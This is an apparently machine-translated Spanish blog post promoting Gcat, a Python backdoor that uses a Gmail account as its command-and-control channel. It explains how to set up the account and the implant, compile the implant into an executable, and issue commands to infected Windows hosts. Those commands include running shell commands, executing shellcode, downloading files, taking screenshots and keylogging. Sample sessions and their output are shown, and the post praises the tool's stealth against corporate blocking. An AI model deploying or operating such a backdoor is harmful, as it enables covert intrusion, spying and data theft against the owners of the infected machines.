Gcat - Usando Gmail para Mando y Control

Gcat es un backdoor Python sigiloso que utiliza Gmail como un servidor de comando y control. Es bastante básico en este momento, pero es una interesante prueba de concepto y si la comunidad se puso detrás de ella y contribuyó algunas nuevas características que podría ser una muy poderosa pieza de equipo.


Cuanto a prestaciones que no tiene que mucho, no puedes subir archivos todavía, pero usted puede ejecutar código shell, descargar archivos y capturas de pantalla de captura.

Pero como concepto es genial, el tráfico de correo electrónico? ¿Cuántas organizaciones bloquearán que, sobre todo a los servidores de Google. Camino menos visible que el tráfico típico de IRC.

Setup

Configuración

Para que esto funcione se necesita:

     Una cuenta de Gmail (Utilice una cuenta dedicada! No utilice su ser personal!)
     Encienda "Permitir aplicaciones menos seguras" en virtud de la configuración de seguridad de la cuenta

Este repo contiene dos archivos:

     gcat.py una secuencia de comandos que se utiliza para enumerar y tema ordena a los clientes disponibles
     implant.py la puerta trasera real de implementar

En ambos archivos, editar los gmail_user y gmail_pwd variables con el nombre de usuario y la contraseña de la cuenta que previamente configuración.

Usted está probablemente va a querer compilar implant.py en un archivo ejecutable utilizando PyInstaller.

Opciones
Gcat

optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-id ID Client to target
-jobid JOBID Job id to retrieve

-list List available clients
-info Retrieve info on specified client

Commands:
Commands to execute on an implant

-cmd CMD Execute a system command
-download PATH Download a file from a clients system
-exec-shellcode FILE Execute supplied shellcode on a client
-screenshot Take a screenshot
-lock-screen Lock the clients screen
-force-checkin Force a check in
-start-keylogger Start keylogger
-stop-keylogger Stop keylogger

Usando Gcat
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86

Una vez que haya implementado la puerta de atrás en un par de sistemas, puede comprobar los clientes disponibles utilizando el comando list:

La salida es una cadena UUID que identifica de forma exclusiva el sistema y el sistema operativo el implante se está ejecutando en

Vamos a emitir un comando a un implante:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv

Aquí le estamos diciendo 90b2cd83-cb36-52de-84ee-99db6ff41a11 ejecutar ipconfig / all, el guión y luego da salida a la JobID que podemos utilizar para recuperar la salida de ese comando

Permite obtener los resultados!

Código:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv  
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

-- SNIP --

Descargar

0 comentarios: sobre Gcat - Usando Gmail para Mando y Control

Publicar un comentario para Gcat - Usando Gmail para Mando y Control

:a   :b   :c   :d   :e   :f   :g   :h   :i   :j   :k   :l   :m   :n   :o   :p   :q   :r   :s   :t

Calculando Tiempo
Alienspace Theme © Copyright 2017 By Proxor
Mi Ping en TotalPing.com FeedBurner FeedBurner FeedBurner FeedBurner FeedBurner